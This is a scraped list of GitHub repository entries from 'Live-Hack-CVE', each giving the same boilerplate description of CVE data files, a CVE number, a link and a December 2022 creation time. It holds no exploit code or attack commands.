**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-0889 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-0889](https://github.com/Live-Hack-CVE/CVE-2013-0889) create time: 2022-12-23T17:02:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-0881 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-0881](https://github.com/Live-Hack-CVE/CVE-2013-0881) create time: 2022-12-23T17:02:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-0883 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-0883](https://github.com/Live-Hack-CVE/CVE-2013-0883) create time: 2022-12-23T17:02:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-0882 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-0882](https://github.com/Live-Hack-CVE/CVE-2013-0882) create time: 2022-12-23T17:02:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-0887 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-0887](https://github.com/Live-Hack-CVE/CVE-2013-0887) create time: 2022-12-23T16:58:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-0884 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-0884](https://github.com/Live-Hack-CVE/CVE-2013-0884) create time: 2022-12-23T16:58:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-0885 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-0885](https://github.com/Live-Hack-CVE/CVE-2013-0885) create time: 2022-12-23T16:58:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-0891 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-0891](https://github.com/Live-Hack-CVE/CVE-2013-0891) create time: 2022-12-23T16:57:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-0892 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-0892](https://github.com/Live-Hack-CVE/CVE-2013-0892) create time: 2022-12-23T16:57:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-0893 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-0893](https://github.com/Live-Hack-CVE/CVE-2013-0893) create time: 2022-12-23T16:57:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-0895 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-0895](https://github.com/Live-Hack-CVE/CVE-2013-0895) create time: 2022-12-23T16:57:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-0896 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-0896](https://github.com/Live-Hack-CVE/CVE-2013-0896) create time: 2022-12-23T16:57:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-0897 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-0897](https://github.com/Live-Hack-CVE/CVE-2013-0897) create time: 2022-12-23T16:57:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-0900 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-0900](https://github.com/Live-Hack-CVE/CVE-2013-0900) create time: 2022-12-23T16:57:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-6981 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-6981](https://github.com/Live-Hack-CVE/CVE-2016-6981) create time: 2022-12-23T17:04:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-4273 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-4273](https://github.com/Live-Hack-CVE/CVE-2016-4273) create time: 2022-12-23T17:04:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-6982 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-6982](https://github.com/Live-Hack-CVE/CVE-2016-6982) create time: 2022-12-23T17:04:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-6983 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-6983](https://github.com/Live-Hack-CVE/CVE-2016-6983) create time: 2022-12-23T17:04:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-6992 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-6992](https://github.com/Live-Hack-CVE/CVE-2016-6992) create time: 2022-12-23T17:03:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-6990 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-6990](https://github.com/Live-Hack-CVE/CVE-2016-6990) create time: 2022-12-23T17:03:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-6984 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-6984](https://github.com/Live-Hack-CVE/CVE-2016-6984) create time: 2022-12-23T17:03:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-6986 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-6986](https://github.com/Live-Hack-CVE/CVE-2016-6986) create time: 2022-12-23T17:03:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-6985 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-6985](https://github.com/Live-Hack-CVE/CVE-2016-6985) create time: 2022-12-23T17:03:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-6987 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-6987](https://github.com/Live-Hack-CVE/CVE-2016-6987) create time: 2022-12-23T17:02:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-6989 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-6989](https://github.com/Live-Hack-CVE/CVE-2016-6989) create time: 2022-12-23T16:57:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-4919 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-4919](https://github.com/Live-Hack-CVE/CVE-2018-4919) create time: 2022-12-23T17:04:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-4920 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-4920](https://github.com/Live-Hack-CVE/CVE-2018-4920) create time: 2022-12-23T17:04:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-4935 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-4935](https://github.com/Live-Hack-CVE/CVE-2018-4935) create time: 2022-12-23T17:04:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-4936 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-4936](https://github.com/Live-Hack-CVE/CVE-2018-4936) create time: 2022-12-23T17:04:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-4937 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-4937](https://github.com/Live-Hack-CVE/CVE-2018-4937) create time: 2022-12-23T17:04:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-4934 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-4934](https://github.com/Live-Hack-CVE/CVE-2018-4934) create time: 2022-12-23T17:03:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14356 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14356](https://github.com/Live-Hack-CVE/CVE-2020-14356) create time: 2022-12-23T16:56:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-24332 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-24332](https://github.com/Live-Hack-CVE/CVE-2020-24332) create time: 2022-12-23T16:56:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43303 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43303](https://github.com/Live-Hack-CVE/CVE-2021-43303) create time: 2022-12-23T17:06:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43302 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43302](https://github.com/Live-Hack-CVE/CVE-2021-43302) create time: 2022-12-23T17:06:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43301 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43301](https://github.com/Live-Hack-CVE/CVE-2021-43301) create time: 2022-12-23T17:05:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43300 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43300](https://github.com/Live-Hack-CVE/CVE-2021-43300) create time: 2022-12-23T17:05:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43299 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43299](https://github.com/Live-Hack-CVE/CVE-2021-43299) create time: 2022-12-23T17:05:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-46837 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-46837](https://github.com/Live-Hack-CVE/CVE-2021-46837) create time: 2022-12-23T17:05:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3778 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3778](https://github.com/Live-Hack-CVE/CVE-2021-3778) create time: 2022-12-23T16:59:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3796 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3796](https://github.com/Live-Hack-CVE/CVE-2021-3796) create time: 2022-12-23T16:59:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4240 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4240](https://github.com/Live-Hack-CVE/CVE-2021-4240) create time: 2022-12-23T16:58:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4241 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4241](https://github.com/Live-Hack-CVE/CVE-2021-4241) create time: 2022-12-23T16:58:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22716 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22716](https://github.com/Live-Hack-CVE/CVE-2021-22716) create time: 2022-12-23T16:55:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-21722 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-21722](https://github.com/Live-Hack-CVE/CVE-2022-21722) create time: 2022-12-23T17:06:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-23608 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-23608](https://github.com/Live-Hack-CVE/CVE-2022-23608) create time: 2022-12-23T17:05:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-24763 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-24763](https://github.com/Live-Hack-CVE/CVE-2022-24763) create time: 2022-12-23T17:05:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-24764 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-24764](https://github.com/Live-Hack-CVE/CVE-2022-24764) create time: 2022-12-23T17:05:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-24786 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-24786](https://github.com/Live-Hack-CVE/CVE-2022-24786) create time: 2022-12-23T17:05:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26651 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26651](https://github.com/Live-Hack-CVE/CVE-2022-26651) create time: 2022-12-23T17:05:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26499 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26499](https://github.com/Live-Hack-CVE/CVE-2022-26499) create time: 2022-12-23T17:05:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26498 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26498](https://github.com/Live-Hack-CVE/CVE-2022-26498) create time: 2022-12-23T17:05:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32907 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32907](https://github.com/Live-Hack-CVE/CVE-2022-32907) create time: 2022-12-23T17:05:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32827 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32827](https://github.com/Live-Hack-CVE/CVE-2022-32827) create time: 2022-12-23T17:05:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3553 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3553](https://github.com/Live-Hack-CVE/CVE-2022-3553) create time: 2022-12-23T17:05:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42124 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42124](https://github.com/Live-Hack-CVE/CVE-2022-42124) create time: 2022-12-23T17:04:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42125 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42125](https://github.com/Live-Hack-CVE/CVE-2022-42125) create time: 2022-12-23T17:04:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42126 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42126](https://github.com/Live-Hack-CVE/CVE-2022-42126) create time: 2022-12-23T17:04:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42127 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42127](https://github.com/Live-Hack-CVE/CVE-2022-42127) create time: 2022-12-23T17:04:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42128 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42128](https://github.com/Live-Hack-CVE/CVE-2022-42128) create time: 2022-12-23T17:04:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45384 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45384](https://github.com/Live-Hack-CVE/CVE-2022-45384) create time: 2022-12-23T17:04:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40843 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40843](https://github.com/Live-Hack-CVE/CVE-2022-40843) create time: 2022-12-23T17:04:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26047 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26047](https://github.com/Live-Hack-CVE/CVE-2022-26047) create time: 2022-12-23T17:03:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-21198 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-21198](https://github.com/Live-Hack-CVE/CVE-2022-21198) create time: 2022-12-23T17:03:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38385 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38385](https://github.com/Live-Hack-CVE/CVE-2022-38385) create time: 2022-12-23T17:03:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40753 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40753](https://github.com/Live-Hack-CVE/CVE-2022-40753) create time: 2022-12-23T17:02:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45047 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45047](https://github.com/Live-Hack-CVE/CVE-2022-45047) create time: 2022-12-23T17:02:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20905 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20905](https://github.com/Live-Hack-CVE/CVE-2022-20905) create time: 2022-12-23T17:02:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20936 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20936](https://github.com/Live-Hack-CVE/CVE-2022-20936) create time: 2022-12-23T17:02:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20932 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20932](https://github.com/Live-Hack-CVE/CVE-2022-20932) create time: 2022-12-23T17:02:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20935 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20935](https://github.com/Live-Hack-CVE/CVE-2022-20935) create time: 2022-12-23T17:02:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20872 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20872](https://github.com/Live-Hack-CVE/CVE-2022-20872) create time: 2022-12-23T17:02:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20832 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20832](https://github.com/Live-Hack-CVE/CVE-2022-20832) create time: 2022-12-23T17:02:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20840 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20840](https://github.com/Live-Hack-CVE/CVE-2022-20840) create time: 2022-12-23T17:02:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-10541 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-10541](https://github.com/Live-Hack-CVE/CVE-2016-10541) create time: 2022-12-23T15:41:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-2127 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-2127](https://github.com/Live-Hack-CVE/CVE-2017-2127) create time: 2022-12-23T16:18:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-8172 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-8172](https://github.com/Live-Hack-CVE/CVE-2018-8172) create time: 2022-12-23T16:15:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-11804 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-11804](https://github.com/Live-Hack-CVE/CVE-2018-11804) create time: 2022-12-23T15:40:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-11770 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-11770](https://github.com/Live-Hack-CVE/CVE-2018-11770) create time: 2022-12-23T15:40:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-18906 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-18906](https://github.com/Live-Hack-CVE/CVE-2019-18906) create time: 2022-12-23T16:22:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-0185 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-0185](https://github.com/Live-Hack-CVE/CVE-2019-0185) create time: 2022-12-23T16:18:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-20800 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-20800](https://github.com/Live-Hack-CVE/CVE-2019-20800) create time: 2022-12-23T16:15:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-20798 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-20798](https://github.com/Live-Hack-CVE/CVE-2019-20798) create time: 2022-12-23T16:13:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-12460 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-12460](https://github.com/Live-Hack-CVE/CVE-2020-12460) create time: 2022-12-23T16:22:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-24609 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-24609](https://github.com/Live-Hack-CVE/CVE-2020-24609) create time: 2022-12-23T16:22:48Z

